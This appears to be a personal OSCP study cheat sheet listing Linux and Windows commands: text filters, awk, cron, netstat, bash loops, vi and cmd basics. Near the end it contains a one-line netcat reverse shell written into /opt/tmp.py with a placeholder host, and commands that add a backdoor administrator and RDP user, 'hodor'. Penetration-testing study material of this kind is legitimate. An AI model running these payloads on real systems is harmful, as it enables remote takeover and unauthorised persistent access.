Linux / Windows Main commands

Linux main commands in OSCP
Find:
# 2>/dev/null sends all "permission denied" errors to /dev/null so only matches are printed.
find / -name file 2>/dev/null
# Sort the listing by last modified time, oldest first (-t time, -r reverse).
ls -ltr

# Remove a directory and all of its contents recursively. Very dangerous command!
rm -rf ./directory

List what the current user is allowed to run with sudo.
sudo -l

Which
Outputs the path of the binary that you are looking for. It searches through the directories that are defined in your $PATH variable.
which bash
# Usually outputs: /bin/bash

Filters
# sort
sort test.txt
# uniq (remove duplicate lines; uniq only collapses adjacent duplicates, so sort first)
sort -u test.txt
sort test.txt | uniq
cat filename | sort -u > newFileName

grep

head

tail

tr

sed
# Delete the first line of the input.
sed "1d"

# cut:
# Given a ping line such as:
64 bytes from 192.168.0.1: icmp_req=1 ttl=255 time=4.86 ms
# the following prints the fourth space-separated field ("192.168.0.1:"):
cut -d" " -f4
-d stands for delimiter and -f for field.

tr - Translate
Transform all letters into capital letters
tr "[:lower:]" "[:upper:]" < file1 > file2

Remove characters
# Remove all dots
cat file.txt | tr -d "."

# Replace all dots with underscores.
cat file.txt | tr "." "_"

awk
awk '/search_pattern/ { action_to_take_on_matches; another_action; }' file_to_parse

# Print every line of error.log matching the pattern (an unescaped "." matches any character).
awk '/172.16.40.10.81/' error.log

# Print every line (equivalent to cat).
awk '{print}' filename

We can use the -F flag to set a custom field delimiter, e.g. print the first colon-separated field:
awk -F ':' '{print $1}' test.txt

If you are manipulating some text you might want to start the output with a header describing the columns. To do that we can use the BEGIN keyword; an END block runs once after the last line has been processed:
awk 'BEGIN {printf "IP-address \tPort\n"} /nop/ {print $3}' test.txt | head
awk 'BEGIN{printf "IP-address \tPort\n"} /nop/ {print $3} END {printf "End of the file\n"}' test.txt | tail
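Putting the filters above together, as an added example that is not part of the original notes: count failed SSH logins per source IP from a constructed auth.log excerpt. The sshd log lines, the host names and the function names are assumptions made for the example.

```shell
#!/bin/bash
# Added example (not from the original notes): chain grep, awk, sort and uniq,
# as introduced above, to count failed SSH logins per source IP.
# The log lines below are constructed sample data in auth.log format.
sample_log() {
  cat <<'EOF'
Mar  3 10:01:02 host sshd[1201]: Failed password for root from 10.0.0.5 port 51022 ssh2
Mar  3 10:01:05 host sshd[1201]: Failed password for invalid user admin from 10.0.0.5 port 51023 ssh2
Mar  3 10:01:09 host sshd[1210]: Accepted password for alice from 10.0.0.9 port 40110 ssh2
Mar  3 10:02:11 host sshd[1222]: Failed password for bob from 192.168.1.20 port 60001 ssh2
Mar  3 10:02:15 host sshd[1222]: Failed password for bob from 192.168.1.20 port 60002 ssh2
Mar  3 10:02:20 host sshd[1222]: Failed password for bob from 192.168.1.20 port 60003 ssh2
EOF
}

# Reads log lines on stdin and prints "count ip", most frequent first.
# A fixed field number with cut would break on the "invalid user" lines, which
# carry two extra words, so awk looks for the word that follows "from" instead.
failed_logins_per_ip() {
  grep 'Failed password' \
    | awk '{ for (i = 1; i < NF; i++) if ($i == "from") print $(i + 1) }' \
    | sort | uniq -c | sort -rn \
    | awk '{ print $1, $2 }'
}

# Same data as a tab-separated table with a BEGIN header and an END footer,
# mirroring the awk BEGIN/END examples above.
failed_logins_report() {
  failed_logins_per_ip \
    | awk 'BEGIN { printf "Count\tIP\n" } { printf "%s\t%s\n", $1, $2 } END { printf "End of report\n" }'
}

sample_log | failed_logins_report
```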
# List the cron jobs of the current user
crontab -l

# Edit or create new cron jobs
crontab -e

# List all disks and their partitions
fdisk -l

# systemctl: start, inspect or stop a service
systemctl start ssh
systemctl status ssh
systemctl stop ssh

Netstat - Find outgoing and incoming connections
Netstat is a multiplatform tool, so it works on macOS, Windows and Linux.
# -a all sockets, -n numeric addresses, -t TCP only, -l listening sockets, -p owning process (root needed to see other users' processes)
$ netstat -antlp

netstat -anpt

# List the current firewall rules
iptables -L

# Remove one specific rule: rule number 2 of the INPUT chain
iptables -D INPUT 2


Iteration over a file

This script will iterate over a file and echo out every single line:
#!/bin/bash

# Note: $(cat ...) splits on any whitespace, not only on newlines, so a line
# containing spaces is echoed as several lines. The while-read loop below is line-safe.
for line in $(cat file.txt); do
    echo "$line"
done

Another Way

#!/bin/bash

# IFS= keeps leading/trailing whitespace, -r keeps backslashes literal.
while IFS= read -r p; do
    echo "$p"
done < file.txt

For Loops

#!/bin/bash

for ((i = 0; i < 10; i++)); do
    echo "$i"
done

Another way to write this is by using the program seq. seq is pretty much like range() in python, so it can be used like this:

#!/bin/bash

for x in $(seq 1 100); do
    echo "$x"
done

#!/bin/bash

# Print the path of the last match that locate returns for 646.c
locate 646.c | tail -n 1

Reading that file directly can be done like this:
#!/bin/bash

cat "$(locate 646.c | tail -n 1)"

VI Operators

VI - Operators
Operators are commands that do things, like delete, change or copy.
c - change
ce - change until end of the word
c$ - change until end of line

Combining Motions and Operators
Now that you know some motion commands and operator commands, you can start combining them.
dw - delete word
d$ - delete to the end of the line

Password Creation

# Generate a crypt-style hash of the password "sam"
openssl passwd sam


Windows Commands

cmd:

show hidden files:
dir /A

Print out file content, like cat
type file.txt

grep files (search a file for a string)
findstr "string" file.txt

show network information
netstat -an

Show network adapter info
ipconfig

Traceroute
tracert hostname

List processes
tasklist

Kill a process
taskkill /PID 1532 /F

Shreds (overwrites) the free space on the whole C: drive
cipher /w:C:\

Mounting - Mapping (list logical drives)
wmic logicaldisk get deviceid, volumename, description


Scripts for fun

Make Request:
import requests

req = requests.get("http://site.com")
print(req.status_code)
print(req.text)

Read and write to files

# Print every line without its trailing newline and flag the line that reads "rad 4".
with open("readme.txt", "r") as file_open:
    for line in file_open:
        print(line.strip("\n"))
        if line.strip("\n") == "rad 4":
            print("last line")

echo 'import os; os.system("/bin/nc ip port -e /bin/bash")' > /opt/tmp.py

Add RDP User

Windows
net user hodor Qwerty123! /add
net localgroup administrators hodor /add
net localgroup "Remote Desktop Users" hodor /add

Enable RDP via Registry

Enable RDP via registry